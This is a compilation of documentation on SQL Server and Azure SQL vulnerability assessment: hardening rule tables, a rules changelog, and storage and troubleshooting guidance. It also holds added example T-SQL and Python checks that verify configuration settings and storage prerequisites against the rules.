Surface Area Reduction

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1022 | Ad hoc distributed queries should be disabled | Medium | Ad hoc distributed queries use the OPENROWSET and OPENDATASOURCE functions to connect to remote data sources that use OLE DB. This rule checks that ad hoc distributed queries are disabled. | SQL Server 2012+
VA1023 | CLR should be disabled | High | The CLR allows managed code to be hosted by and run in the Microsoft SQL Server environment. This rule checks that CLR is disabled. | SQL Server 2012+
VA1026 | CLR should be disabled | Medium | The CLR allows managed code to be hosted by and run in the Microsoft SQL Server environment. CLR strict security treats SAFE and EXTERNAL_ACCESS assemblies as if they were marked UNSAFE and requires all assemblies to be signed by a certificate or asymmetric key with a corresponding login that has been granted UNSAFE ASSEMBLY permission in the master database. This rule checks that CLR is disabled. | SQL Server 2017+ (footnote), SQL Managed Instance
VA1027 | Untracked trusted assemblies should be removed | High | Assemblies marked as UNSAFE are required to be signed by a certificate or asymmetric key with a corresponding login that has been granted UNSAFE ASSEMBLY permission in the master database. Trusted assemblies may bypass this requirement. | SQL Server 2017+, SQL Managed Instance
VA1044 | Remote Admin Connections should be disabled unless specifically required | Medium | This rule checks that remote dedicated admin connections are disabled if they are not being used for clustering, to reduce attack surface area. SQL Server provides a dedicated administrator connection (DAC). The DAC lets an administrator access a running server to execute diagnostic functions or Transact-SQL statements, or to troubleshoot problems on the server, and it becomes an attractive target to attack when it is enabled remotely. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1051 | AUTO_CLOSE should be disabled on all databases | Medium | The AUTO_CLOSE option specifies whether the database shuts down gracefully and frees resources after the last user disconnects. Regardless of its benefits, it can cause denial of service by aggressively opening and closing the database, thus it is important to keep this feature disabled. This rule checks that this option is disabled on the current database. | SQL Server 2012+
VA1066 | Unused service broker endpoints should be removed | Low | Service Broker provides queuing and reliable messaging for SQL Server. Service Broker is used both for applications that use a single SQL Server instance and applications that distribute work across multiple instances. Service Broker endpoints provide options for transport security and message forwarding. This rule enumerates all the service broker endpoints. Remove those that are not used. | SQL Server 2012+
VA1071 | 'Scan for startup stored procedures' option should be disabled | Medium | When 'Scan for startup procs' is enabled, SQL Server scans for and runs all automatically run stored procedures defined on the server. This rule checks that this option is disabled. | SQL Server 2012+
VA1092 | SQL Server instance shouldn't be advertised by the SQL Server Browser service | Low | SQL Server uses the SQL Server Browser service to enumerate instances of the Database Engine installed on the computer. This enables client applications to browse for a server and helps clients distinguish between multiple instances of the Database Engine on the same computer. This rule checks that the SQL instance is hidden. | SQL Server 2012+
VA1102 | The Trustworthy bit should be disabled on all databases except MSDB | High | The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database and the contents within it. If this option is enabled, database modules (for example user-defined functions or stored procedures) that use an impersonation context can access resources outside the database. This rule verifies that the TRUSTWORTHY bit is disabled on all databases except MSDB. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1143 | 'dbo' user should not be used for normal service operation | Medium | The 'dbo' or database owner is a user account that has implied permissions to perform all activities in the database. Members of the sysadmin fixed server role are automatically mapped to dbo. This rule checks that dbo is not the only account allowed to access this database. Note that on a newly created clean database this rule will fail until additional roles are created. | SQL Server 2012+, SQL Managed Instance, SQL Database, Azure Synapse
VA1144 | Model database should only be accessible by 'dbo' | Medium | The Model database is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, recovery model, and other database options, are applied to any databases created afterward. This rule checks that dbo is the only account allowed to access the model database. | SQL Server 2012+, SQL Managed Instance
VA1230 | Filestream should be disabled | High | FILESTREAM integrates the SQL Server Database Engine with an NTFS file system by storing varbinary(max) binary large object (BLOB) data as files on the file system. Transact-SQL statements can insert, update, query, search, and back up FILESTREAM data. Enabling Filestream on SQL Server exposes an additional NTFS streaming API, which increases its attack surface and makes it prone to malicious attacks. This rule checks that Filestream is disabled. | SQL Server 2012+
VA1235 | Server configuration 'Replication XPs' should be disabled | Medium | Disable the deprecated server configuration 'Replication XPs' to limit the attack surface area. This is an internal-only configuration setting. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA1244 | Orphaned users should be removed from SQL server databases | Medium | A database user that exists on a database but has no corresponding login in the master database or as an external resource (for example, a Windows user) is referred to as an orphaned user, and it should either be removed or remapped to a valid login. This rule checks that there are no orphaned users. | SQL Server 2012+, SQL Managed Instance
VA1245 | The dbo information should be consistent between the target DB and master | High | There is redundant information about the dbo identity for any database: metadata stored in the database itself and metadata stored in master DB. This rule checks that this information is consistent between the target DB and master. | SQL Server 2012+, SQL Managed Instance
VA1247 | There should be no SPs marked as auto-start | High | When SQL Server has been configured to 'scan for startup procs', the server will scan master DB for stored procedures marked as auto-start. This rule checks that there are no SPs marked as auto-start. | SQL Server 2012+
VA1256 | User CLR assemblies should not be defined in the database | High | CLR assemblies can be used to execute arbitrary code in the SQL Server process. This rule checks that there are no user-defined CLR assemblies in the database. | SQL Server 2012+, SQL Managed Instance
VA1277 | Polybase network encryption should be enabled | High | PolyBase is a technology that accesses and combines both non-relational and relational data, all from within SQL Server. The Polybase network encryption option configures SQL Server to encrypt control and data channels when using Polybase. This rule verifies that this option is enabled. | SQL Server 2016+
VA1278 | Create a baseline of External Key Management Providers | Medium | SQL Server Extensible Key Management (EKM) enables third-party EKM / Hardware Security Module (HSM) vendors to register their modules in SQL Server. When registered, SQL Server users can use the encryption keys stored on EKM modules. This rule displays a list of EKM providers being used in the system. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA2062 | Database-level firewall rules should not grant excessive access | High | The Azure SQL Database-level firewall helps protect your data by preventing all access to your database until you specify which IP addresses have permission. Database-level firewall rules grant access to the specific database based on the originating IP address of each request. Database-level firewall rules for master and user databases can only be created and managed through Transact-SQL (unlike server-level firewall rules, which can also be created and managed using the Azure portal or PowerShell). For more information, see Azure SQL Database and Azure Synapse Analytics IP firewall rules. This check verifies that database-level firewall rules do not grant access to more than 255 IP addresses. | SQL Database, Azure Synapse
VA2063 | Server-level firewall rules should not grant excessive access | High | The Azure SQL server-level firewall helps protect your server by preventing all access to your databases until you specify which IP addresses have permission. Server-level firewall rules grant access to all databases that belong to the server based on the originating IP address of each request. Server-level firewall rules can be created and managed through Transact-SQL as well as through the Azure portal or PowerShell. For more information, see Azure SQL Database and Azure Synapse Analytics IP firewall rules. This check verifies that server-level firewall rules do not grant access to more than 255 IP addresses. | SQL Database, Azure Synapse

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA2064 | Database-level firewall rules should be tracked and maintained at a strict minimum | High | The Azure SQL Database-level firewall helps protect your data by preventing all access to your database until you specify which IP addresses have permission. Database-level firewall rules grant access to the specific database based on the originating IP address of each request. Database-level firewall rules for master and user databases can only be created and managed through Transact-SQL (unlike server-level firewall rules, which can also be created and managed using the Azure portal or PowerShell). For more information, see Azure SQL Database and Azure Synapse Analytics IP firewall rules. This check enumerates all the database-level firewall rules so that any changes made to them can be identified and addressed. | SQL Database, Azure Synapse
VA2065 | Server-level firewall rules should be tracked and maintained at a strict minimum | High | The Azure SQL server-level firewall helps protect your data by preventing all access to your databases until you specify which IP addresses have permission. Server-level firewall rules grant access to all databases that belong to the server based on the originating IP address of each request. Server-level firewall rules can be created and managed through Transact-SQL as well as through the Azure portal or PowerShell. For more information, see Azure SQL Database and Azure Synapse Analytics IP firewall rules. This check enumerates all the server-level firewall rules so that any changes made to them can be identified and addressed. | SQL Database, Azure Synapse
VA2111 | Sample databases should be removed | Low | Microsoft SQL Server comes shipped with several sample databases. This rule checks whether the sample databases have been removed. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA2120 | Features that may affect security should be disabled | High | SQL Server is capable of providing a wide range of features and services. Some of the features and services provided by default may not be necessary, and enabling them could adversely affect the security of the system. This rule checks that these features are disabled. | SQL Server 2012+, SQL Managed Instance
VA2121 | 'OLE Automation Procedures' feature should be disabled | High | SQL Server is capable of providing a wide range of features and services. Some of the features and services, provided by default, may not be necessary, and enabling them could adversely affect the security of the system. The OLE Automation Procedures option controls whether OLE Automation objects can be instantiated within Transact-SQL batches. These are extended stored procedures that allow SQL Server users to execute functions external to SQL Server. Regardless of its benefits, it can also be used for exploits, and is known as a popular mechanism to plant files on the target machines. It is advised to use PowerShell as a replacement for this tool. This rule checks that the 'OLE Automation Procedures' feature is disabled. | SQL Server 2012+, SQL Managed Instance
VA2122 | 'User Options' feature should be disabled | Medium | SQL Server is capable of providing a wide range of features and services. Some of the features and services provided by default may not be necessary, and enabling them could adversely affect the security of the system. The user options setting specifies global defaults for all users. A list of default query processing options is established for the duration of a user's work session. The user options setting allows you to change the default values of the SET options (if the server's default settings are not appropriate). This rule checks that the 'user options' feature is disabled. | SQL Server 2012+, SQL Managed Instance

Rule ID | Rule Title | Rule Severity | Rule Description | Platform
VA2126 | Extensibility-features that may affect security should be disabled if not needed | Medium | SQL Server provides a wide range of features and services. Some of the features and services, provided by default, may not be necessary, and enabling them could adversely affect the security of the system. This rule checks that configurations that allow extraction of data to an external data source and the execution of scripts with certain remote language extensions are disabled. | SQL Server 2016+
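One way to check the sp_configure options behind the Surface Area Reduction rules in a single pass, as an added example that is not code from the page or the assessment service: the expected value for each rule is the disabled state its description calls for, except VA1277, where the rule wants PolyBase network encryption on. The rule-to-option mapping is mine, and VA1026 has no row of its own because the page describes it in terms of CLR being disabled, which the 'clr enabled' row already covers. The second and third parts cover the two database properties (VA1051, VA1102) and the hidden-instance flag (VA1092) that are not sp_configure options.

```sql
-- Added example (not from the Microsoft page). Part 1: sp_configure options
-- compared with the value each rule expects (mapping is mine). Options that
-- do not exist on the connected version report NOT PRESENT instead of FAIL.
WITH expected (option_name, expected_value, rule_id) AS (
    SELECT 'Ad Hoc Distributed Queries',  0, 'VA1022' UNION ALL
    SELECT 'clr enabled',                 0, 'VA1023' UNION ALL
    SELECT 'remote admin connections',    0, 'VA1044' UNION ALL
    SELECT 'scan for startup procs',      0, 'VA1071' UNION ALL
    SELECT 'filestream access level',     0, 'VA1230' UNION ALL
    SELECT 'Replication XPs',             0, 'VA1235' UNION ALL
    SELECT 'polybase network encryption', 1, 'VA1277' UNION ALL   -- the one "should be ON" rule
    SELECT 'Ole Automation Procedures',   0, 'VA2121' UNION ALL
    SELECT 'user options',                0, 'VA2122' UNION ALL
    SELECT 'external scripts enabled',    0, 'VA2126'
)
SELECT e.rule_id,
       e.option_name,
       c.value_in_use,
       e.expected_value,
       CASE
           WHEN c.name IS NULL THEN 'NOT PRESENT'
           WHEN CAST(c.value_in_use AS int) = e.expected_value THEN 'PASS'
           ELSE 'FAIL'
       END AS result
FROM expected AS e
LEFT JOIN sys.configurations AS c ON c.name = e.option_name
ORDER BY e.rule_id;

-- Part 2: database properties for VA1051 (AUTO_CLOSE) and VA1102
-- (TRUSTWORTHY; the rule exempts msdb, which ships with it on).
SELECT name,
       is_auto_close_on,
       is_trustworthy_on,
       CASE WHEN is_auto_close_on = 1 THEN 'FAIL' ELSE 'PASS' END AS auto_close_result,
       CASE WHEN is_trustworthy_on = 1 AND name <> 'msdb' THEN 'FAIL' ELSE 'PASS' END AS trustworthy_result
FROM sys.databases
ORDER BY name;

-- Part 3: VA1092. "Hide instance" is a network-library flag in the instance
-- registry hive; 1 means the Browser service does not advertise the instance.
-- Requires permission to run master.dbo.xp_instance_regread.
DECLARE @hide_instance int;
EXEC master.dbo.xp_instance_regread
     N'HKEY_LOCAL_MACHINE',
     N'Software\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib',
     N'HideInstance',
     @hide_instance OUTPUT;
SELECT ISNULL(@hide_instance, 0) AS hide_instance,
       CASE WHEN @hide_instance = 1 THEN 'PASS' ELSE 'FAIL' END AS result;
```

value_in_use is the running value; sys.configurations also carries value, the configured value that takes effect after RECONFIGURE or a restart. A row where the two differ means someone changed the option but it has not been applied yet, which is worth surfacing in a change review even though the scan would still report the running state.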


Removed rules

Rule ID | Rule Title
VA1021 | Global temporary stored procedures should be removed
VA1024 | C2 Audit Mode should be enabled
VA1069 | Permissions to select from system tables and views should be revoked from non-sysadmins
VA1090 | Ensure all Government Off The Shelf (GOTS) and Custom Stored Procedures are encrypted
VA1103 | Use only CLR with SAFE_ACCESS permission
VA1229 | Filestream setting in registry and in SQL Server configuration should match
VA1231 | Filestream should be disabled (SQL)
VA1234 | Common Criteria setting should be enabled
VA1252 | List of events being audited and centrally managed via server audit specifications.
VA1253 | List of DB-scoped events being audited and centrally managed via server audit specifications
VA1263 | List all the active audits in the system
VA1266 | The 'MUST_CHANGE' option should be set on all SQL logins
VA1276 | Agent XPs feature should be disabled
VA1286 | Database permissions shouldn't be granted directly to principals (OBJECT or COLUMN)
VA2000 | Minimal set of principals should be granted high impact database-scoped permissions
VA2001 | Minimal set of principals should be granted high impact database-scoped permissions on objects or columns
VA2002 | Minimal set of principals should be granted high impact database-scoped permissions on various securables
VA2010 | Minimal set of principals should be granted medium impact database-scoped permissions
VA2021 | Minimal set of principals should be granted database-scoped ALTER permissions on objects or columns
VA2022 | Minimal set of principals should be granted database-scoped ALTER permission on various securables
VA2030 | Minimal set of principals should be granted database-scoped SELECT or EXECUTE permissions
VA2031 | Minimal set of principals should be granted database-scoped SELECT
VA2032 | Minimal set of principals should be gran
VA2032 | Minimal set of principals should be granted database-scoped SELECT or EXECUTE permissions on schema
VA2034 | Minimal set of principals should be granted database-scoped EXECUTE permission on XML Schema Collection
VA2040 | Minimal set of principals should be granted low impact database-scoped permissions
VA2041 | Minimal set of principals should be granted low impact database-scoped permissions on objects or columns
VA2042 | Minimal set of principals should be granted low impact database-scoped permissions on schema
VA2050 | Minimal set of principals should be granted database-scoped VIEW DEFINITION permissions
VA2051 | Minimal set of principals should be granted database-scoped VIEW DEFINITION permissions on objects or columns
VA2052 | Minimal set of principals should be granted database-scoped VIEW DEFINITION permission on various securables
VA2100 | Minimal set of principals should be granted high impact server-scoped permissions
VA2101 | Minimal set of principals should be granted medium impact server-scoped permissions
VA2102 | Minimal set of principals should be granted low impact server-scoped permissions
VA2104 | Execute permissions on extended stored procedures should be revoked from PUBLIC
VA2105 | Login password should not be easily guessed
VA2112 | Permissions from PUBLIC for Data Transformation Services (DTS) should be revoked
VA2115 | Minimal set of principals should be members of medium impact fixed server roles
VA2123 | 'Remote Access' feature should be disabled
VA2127 | 'External Scripts' feature should be disabled


Next steps

- Vulnerability assessment
- SQL vulnerability assessment rules changelog


SQL vulnerability assessment rules changelog

Article · 12/29/2022


This article details the changes made to the SQL vulnerability assessment service rules. 
Rules that are updated, removed, or added will be outlined below. For an updated list of 
SQL vulnerability assessment rules, see SQL vulnerability assessment rules. 


June 2022 


Rule ID | Rule Title | Change details
VA2129 | Changes to signed modules should be authorized | Logic change
VA1219 | Transparent data encryption should be enabled | Logic change
VA1047 | Password expiration check should be enabled for all SQL logins | Logic change


January 2022 


Rule ID | Rule Title | Change details
VA1288 | Sensitive data columns should be classified | Removed rule
VA1054 | Minimal set of principals should be members of fixed high impact database roles | Logic change
VA1220 | Database communication using TDS should be protected through TLS | Logic change
VA2120 | Features that may affect security should be disabled | Logic change
VA2129 | Changes to signed modules should be authorized | Logic change


June 2021 


Rule ID | Rule Title | Change details
VA1220 | Database communication using TDS should be protected through TLS | Logic change
VA2108 | Minimal set of principals should be members of fixed high impact database roles | Logic change

December 2020

Rule ID | Rule Title | Change details
VA1017 | Execute permissions on xp_cmdshell from all users (except dbo) should be revoked | Title and description change
VA1021 | Global temporary stored procedures should be removed | Removed rule
VA1024 | C2 Audit Mode should be enabled | Removed rule
VA1042 | Database ownership chaining should be disabled for all databases except for master, msdb, and tempdb | Description change
VA1044 | Remote Admin Connections should be disabled unless specifically required | Title and description change
VA1047 | Password expiration check should be enabled for all SQL logins | Title and description change
VA1051 | AUTO_CLOSE should be disabled on all databases | Description change
VA1053 | Account with default name 'sa' should be renamed or disabled | Description change
VA1067 | Database Mail XPs should be disabled when it is not in use | Title and description change
VA1068 | Server permissions shouldn't be granted directly to principals | Logic change
VA1069 | Permissions to select from system tables and views should be revoked from non-sysadmins | Removed rule
VA1090 | Ensure all Government Off The Shelf (GOTS) and Custom Stored Procedures are encrypted | Removed rule
VA1091 | Auditing of both successful and failed login attempts (default trace) should be enabled when 'Login auditing' is set up to track logins | Description change


VA1098  Any Existing SSB or Mirroring endpoint should require AES connection  Logic change
VA1103  Use only CLR with SAFE_ACCESS permission  Removed rule
VA1219  Transparent data encryption should be enabled  Description change
VA1229  Filestream setting in registry and in SQL Server configuration should match  Removed rule
VA1230  Filestream should be disabled  Description change
VA1231  Filestream should be disabled (SQL)  Removed rule
VA1234  Common Criteria setting should be enabled  Removed rule
VA1235  Replication XPs should be disabled  Title, description, and logic change
VA1252  List of events being audited and centrally managed via server audit specifications.  Removed rule
VA1253  List of DB-scoped events being audited and centrally managed via server audit specifications.  Removed rule
VA1263  List all the active audits in the system  Removed rule
VA1264  Auditing of both successful and failed login attempts should be enabled  Description change
VA1266  The 'MUST_CHANGE' option should be set on all SQL logins  Removed rule
VA1276  Agent XPs feature should be disabled  Removed rule
VA1281  All memberships for user-defined roles should be intended  Logic change
VA1282  Orphan roles should be removed  Logic change
VA1286  Database permissions shouldn't be granted directly to principals (OBJECT or COLUMN)  Removed rule
VA1288  Sensitive data columns should be classified  Description change
VA2030  Minimal set of principals should be granted database-scoped SELECT or EXECUTE permissions  Removed rule


VA2033  Minimal set of principals should be granted database-scoped EXECUTE permission on objects or columns  Description change
VA2062  Database-level firewall rules should not grant excessive access  Description change
VA2063  Server-level firewall rules should not grant excessive access  Description change
VA2100  Minimal set of principals should be granted high impact server-scoped permissions  Removed rule
VA2101  Minimal set of principals should be granted medium impact server-scoped permissions  Removed rule
VA2102  Minimal set of principals should be granted low impact server-scoped permissions  Removed rule
VA2103  Unnecessary execute permissions on extended stored procedures should be revoked  Logic change
VA2104  Execute permissions on extended stored procedures should be revoked from PUBLIC  Removed rule
VA2105  Login password should not be easily guessed  Removed rule
VA2108  Minimal set of principals should be members of fixed high impact database roles  Logic change
VA2111  Sample databases should be removed  Logic change
VA2112  Permissions from PUBLIC for Data Transformation Services (DTS) should be revoked  Removed rule
VA2113  Data Transformation Services (DTS) permissions should only be granted to SSIS roles  Description and logic change
VA2114  Minimal set of principals should be members of high impact fixed server roles  Logic change
VA2115  Minimal set of principals should be members of medium impact fixed server roles  Removed rule
VA2120  Features that may affect security should be disabled  Logic change
VA2121  'OLE Automation Procedures' feature should be disabled  Title and description change
VA2123  'Remote Access' feature should be disabled  Removed rule


VA2126  Features that may affect security should be disabled  Title, description, and logic change
VA2127  'External Scripts' feature should be disabled  Removed rule
VA2129  Changes to signed modules should be authorized  Platform update
VA2130  Track all users with access to the database  Description and logic change


Next steps


• SQL vulnerability assessment rules
• SQL vulnerability assessment overview
• Store vulnerability assessment scan results in a storage account accessible behind firewalls and VNets


Store Vulnerability Assessment scan results in a storage account accessible behind firewalls and VNets


Article · 10/11/2023


Applies to: Azure SQL Database, Azure SQL Managed Instance, Azure Synapse Analytics


If you limit access to your storage account in Azure to certain VNets or services, you need to enable the appropriate configuration so that Vulnerability Assessment (VA) scanning for Azure SQL Database or Azure SQL Managed Instance has access to that storage account.


Note


These settings are not required when using Express Configuration. 


Prerequisites 


The SQL Vulnerability Assessment service needs permission to the storage account to save baseline and scan results.


Use SQL Server managed identity:


• The SQL Server must have a managed identity.

• The storage account must have a role assignment for the SQL Managed Identity as Storage Blob Data Contributor.

• When you apply the settings, the VA fields storageContainerSasKey and storageAccountAccessKey must be empty (configuration using a storage account key or storage SAS key is not valid for this scenario).


When you use the Azure portal to save SQL VA settings, Azure checks whether you have permission to create a new role assignment for the managed identity as Storage Blob Data Contributor on the storage account. If you do, Azure uses the SQL Server managed identity; otherwise Azure uses the key method (which is not supported for this scenario).


Note


1. User-assigned managed identities are not supported for this scenario.
2. If you use Azure Storage lifecycle management policies, avoid moving files in the container used by VA to the archive access tier. Reading scan results or baseline configurations stored in the archive access tier isn't supported.


Enable Azure SQL Database VA scanning access to the storage account


If you've configured your VA storage account to only be accessible by certain networks 
or services, you'll need to ensure that VA scans for your Azure SQL Database are able to 
store the scans on the storage account. You can use the existing storage account, or 
create a new storage account to store VA scan results for all databases on your logical 
SQL server. 


Note
The vulnerability assessment service can't access storage accounts protected with firewalls or VNets if they require storage access keys.

Go to the resource group that contains the storage account and open the Storage account pane. Under Settings, select Firewall and virtual networks.


Ensure that Allow trusted Microsoft services access to this storage account is checked. 


[Screenshot: the storage account's Firewall and virtual networks pane. Under Exceptions, "Allow trusted Microsoft services to access this storage account" is checked.]


To find out which storage account is being used, do the following steps: 


1. Go to your SQL server pane in the Azure portal.
2. Under Security, select Defender for Cloud. 
3. Select Configure. 


[Screenshot: the Server settings pane for Microsoft Defender for SQL, showing the Vulnerability Assessment settings: the selected subscription and storage account, the Periodic recurring scans toggle, and the "Send scan reports to" email addresses.]


Store VA scan results for Azure SQL Managed Instance in a storage account that can be accessed behind a firewall or VNet


Since Azure SQL Managed Instance isn't a trusted Microsoft Service and has a different 
VNet from the storage account, executing a VA scan will result in an error. 


Note


It is highly recommended to make sure your Azure SQL Managed Instances are enrolled in the November 2022 feature wave, which allows much simpler configuration of SQL Vulnerability Assessment when the storage account is behind a firewall or VNet.


To support VA scans on Azure SQL Managed Instances that have the November 2022 
feature wave installed, follow the below steps: 


1. Under the Azure SQL Managed Instance's Overview page, note the value under 
Virtual network / subnet. 


2. Head to the Networking page in the storage account where SQL VA is configured 
to store the scan results. 


3. Under the Firewalls and virtual networks tab, under Public network access select 
Enabled from selected virtual networks and IP addresses. 


4. Under the Virtual networks section, click Add existing virtual network and select the VNet and subnet used by the managed instance that you noted in the first step.


[Screenshot: the Add networks pane of the storage account's Networking page, with the managed instance's virtual network and subnet selected.]


To support VA scans on Azure SQL Managed Instances that do not have the November 
2022 feature wave installed, follow the below steps: 


1. In the SQL managed instance pane, under the Overview heading, click the Virtual 
network/subnet link. This takes you to the Virtual network pane. 


[Screenshot: the SQL managed instance Overview pane, Essentials section, including the Virtual network / subnet link.]


2. Under Settings, select Subnets. Click + Subnet in the new pane to add a subnet. 


For more information, see Manage subnets. 


[Screenshot: the virtual network's Subnets pane, listing the ManagedInstance subnet (10.0.0.0/24, delegated to Microsoft.Sql/managedInstances) and the new VulnerabilityAssessment subnet (10.0.1.0/24).]


3. The new subnet should have the following configurations: 
[Screenshot: the Add subnet pane with the settings listed below.]

• NAT gateway: None
• Network security group: None
• Route table: None
• SERVICE ENDPOINTS - Services: None selected
• SUBNET DELEGATION - Delegate subnet to a service: None
• NETWORK POLICY FOR PRIVATE ENDPOINTS - Private endpoint network policy: None selected


4. Head to the storage account where SQL VA is configured to store the scan results, click the Private endpoint connections tab, then click + Private endpoint.


[Screenshots: the storage account's Networking page, first the Firewalls and virtual networks tab with "Enabled from selected virtual networks and IP addresses" selected, then the Private endpoint connections tab with + Private endpoint highlighted.]


5. Choose the details for your private endpoint (it's suggested to put it in the same resource group and the same region).


[Screenshot: Create a private endpoint, Basics tab: subscription, resource group, instance name, network interface name, and region.]


6. Choose blob for the Target sub-resource.


[Screenshot: Create a private endpoint, Resource tab: Resource type Microsoft.Storage/storageAccounts, Resource myvastorage, Target sub-resource blob.]


7. Select the virtual network of the SQL MI (from step 1) and choose the subnet you 
created (step 3): 


[Screenshot: Create a private endpoint, Virtual Network tab: the managed instance's virtual network and the VulnerabilityAssessment subnet selected, private IP address allocated dynamically.]


8. Select Integrate with private DNS zone (should be the default) and keep the other default values.


[Screenshot: Create a private endpoint, DNS tab: Integrate with private DNS zone set to Yes, with a privatelink blob private DNS zone in the same resource group.]


9. Continue to the Review + Create tab and click Create. Once the deployment is 
done you should see this in the Private endpoint connections tab under the 
Network section of the Storage account: 


[Screenshot: the storage account's Private endpoint connections tab showing the new connection with Connection state Approved (Auto-Approved).]


You should now be able to store your VA scans for Azure SQL Managed Instances in 
your storage account. 


Troubleshoot vulnerability assessment scan-related issues


Troubleshoot common issues related to vulnerability assessment scans. 


Failure to save vulnerability assessment settings 


You might not be able to save changes to vulnerability assessment settings if your 
storage account doesn't meet some prerequisites or if you have insufficient permissions. 


Storage account requirements 


The storage account in which vulnerability assessment scan results are saved must meet 
the following requirements: 


• Type: StorageV2 (General Purpose V2) or Storage (General Purpose V1)

• Performance: Standard (only)

• Region: The storage account must be in the same region as the instance of Azure SQL Server.


If any of these requirements aren't met, saving changes to vulnerability assessment 
settings fails. 
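The storage-account requirements above and the managed-identity prerequisites described earlier in this article can be checked before you try to save the settings. The following is an added example, not Microsoft code: it takes the storage account, logical SQL server, role assignments and VA settings as plain dicts shaped like the JSON that `az storage account show`, `az sql server show` and `az role assignment list` return (that shape is an assumption made here), with constructed sample values, and reports every requirement that fails.

```python
"""Check the prerequisites for saving SQL Vulnerability Assessment settings
with a storage account behind a firewall or VNet.

Added example, not Microsoft code. Inputs are plain dicts shaped like the JSON
returned by `az storage account show`, `az sql server show` and
`az role assignment list` (that shape is an assumption made here, not
something this article documents); the sample values below are constructed.
"""
from dataclasses import dataclass, field

ALLOWED_KINDS = {"StorageV2", "Storage"}         # General Purpose V2 or V1
REQUIRED_ROLE = "Storage Blob Data Contributor"  # role the SQL managed identity needs


@dataclass
class CheckResult:
    ok: bool
    problems: list = field(default_factory=list)


def _scope_covers(scope: str, resource_id: str) -> bool:
    """True if a role assignment scope is the resource itself or one of its parents."""
    if not scope:
        return False
    scope, resource_id = scope.lower().rstrip("/"), resource_id.lower()
    return resource_id == scope or resource_id.startswith(scope + "/")


def check_va_storage_prereqs(storage: dict, sql_server: dict,
                             role_assignments: list, va_settings: dict) -> CheckResult:
    problems = []

    # Storage account requirements: type, performance tier, same region as the server.
    if storage.get("kind") not in ALLOWED_KINDS:
        problems.append(f"storage kind {storage.get('kind')!r} is not StorageV2 or Storage")
    if (storage.get("sku") or {}).get("tier") != "Standard":
        problems.append("storage performance tier must be Standard")
    if storage.get("location") != sql_server.get("location"):
        problems.append("storage account and SQL server are in different regions")

    # A firewalled account (defaultAction Deny) must still admit trusted Microsoft
    # services for the Azure SQL Database scenario; 'bypass' is a comma-separated string.
    net = storage.get("networkRuleSet") or {}
    if net.get("defaultAction") == "Deny":
        bypass = {b.strip() for b in (net.get("bypass") or "").split(",")}
        if "AzureServices" not in bypass:
            problems.append("firewalled storage account does not allow trusted Microsoft services")

    # The server needs a system-assigned managed identity (user-assigned is not supported) ...
    identity = sql_server.get("identity") or {}
    principal_id = identity.get("principalId")
    if "SystemAssigned" not in (identity.get("type") or ""):
        problems.append("SQL server has no system-assigned managed identity")
    # ... holding Storage Blob Data Contributor on the storage account (or a parent scope).
    elif not any(ra.get("roleDefinitionName") == REQUIRED_ROLE
                 and ra.get("principalId") == principal_id
                 and _scope_covers(ra.get("scope", ""), storage.get("id", ""))
                 for ra in role_assignments):
        problems.append(f"managed identity lacks '{REQUIRED_ROLE}' on the storage account")

    # Key-based access is not valid here: both VA key fields must be empty.
    for key_field in ("storageContainerSasKey", "storageAccountAccessKey"):
        if va_settings.get(key_field):
            problems.append(f"{key_field} must be empty when using the managed identity")

    return CheckResult(ok=not problems, problems=problems)


# Constructed sample inputs (not real resources).
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
SAMPLE_STORAGE = {
    "id": f"{SUB}/resourceGroups/demo-rg/providers/Microsoft.Storage/storageAccounts/vastore",
    "kind": "StorageV2", "sku": {"tier": "Standard"}, "location": "eastus",
    "networkRuleSet": {"defaultAction": "Deny", "bypass": "AzureServices"},
}
SAMPLE_SQL_SERVER = {
    "location": "eastus",
    "identity": {"type": "SystemAssigned", "principalId": "11111111-1111-1111-1111-111111111111"},
}
SAMPLE_ROLE_ASSIGNMENTS = [{
    "roleDefinitionName": REQUIRED_ROLE,
    "principalId": "11111111-1111-1111-1111-111111111111",
    "scope": f"{SUB}/resourceGroups/demo-rg",   # inherited from the resource group scope
}]
SAMPLE_VA_SETTINGS = {"storageContainerSasKey": "", "storageAccountAccessKey": ""}

if __name__ == "__main__":
    result = check_va_storage_prereqs(SAMPLE_STORAGE, SAMPLE_SQL_SERVER,
                                      SAMPLE_ROLE_ASSIGNMENTS, SAMPLE_VA_SETTINGS)
    print("OK" if result.ok else "\n".join(result.problems))
```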


Permissions 


The following permissions are required to save changes to vulnerability assessment 
settings: 


• SQL Security Manager
• Storage Blob Data Reader
• Owner role on the storage account


Setting a new role assignment requires owner or user administrator access to the 
storage account and the following permissions: 


• Storage Blob Data Owner


Storage account isn't visible for selection in vulnerability assessment settings


The storage account might not appear in the storage account picker for several reasons: 


• The storage account you're looking for isn't in the selected subscription.

• The storage account you're looking for isn't in the same region as the instance of Azure SQL Server.

• You don't have Microsoft.Storage/storageAccounts/read permissions on the storage account.


Failure to open an email link for scan results or can't view scan results


You might not be able to open a link in a notification email about scan results, or to view 
scan results if you don't have the required permissions, or if you use a browser that 
doesn't support opening or displaying scan results. 


Required permissions 


The following permissions are required to open links in email notifications about scan results or to view scan results:


• SQL Security Manager
• Storage Blob Data Reader


Browser requirements 


The Firefox browser doesn't support opening or displaying the scan results view. We recommend that you use Microsoft Edge or Chrome to view vulnerability assessment scan results.


Next steps 


• Vulnerability Assessment
• Create an Azure Storage account
• Microsoft Defender for SQL


How to consume and export scan results


Article · 06/05/2023


Defender for SQL's Vulnerability Assessment (VA) capability scans your databases on a weekly basis and produces reports on any misconfigurations that are identified.


All findings are stored in Azure Resource Graph (ARG), which is also the source for most of the Defender for SQL UI experience. When findings are written to ARG, they're also enriched with other Microsoft Defender for Cloud settings, such as disabled rules or exempted recommendations, so that the data consumed from ARG represents the effective status of all findings and recommendations.


